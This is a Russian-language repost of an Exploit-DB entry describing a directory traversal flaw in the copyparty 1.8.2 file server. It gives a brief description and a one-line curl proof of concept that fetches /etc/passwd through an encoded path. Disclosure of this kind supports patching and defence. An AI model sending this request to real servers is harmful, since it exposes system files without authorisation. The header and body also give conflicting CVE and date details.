- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 51636
- Проверка EDB
-
- Пройдено
- Автор
- VARTAMTEZIDIS THEODOROS
- Тип уязвимости
- WEBAPPS
- Платформа
- PYTHON
- CVE
- cve-N/A
- Дата публикации
- 2023-07-28
copyparty 1.8.2 - Directory Traversal
Код:
# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474
#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.
#POC
curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'- Источник
- www.exploit-db.com
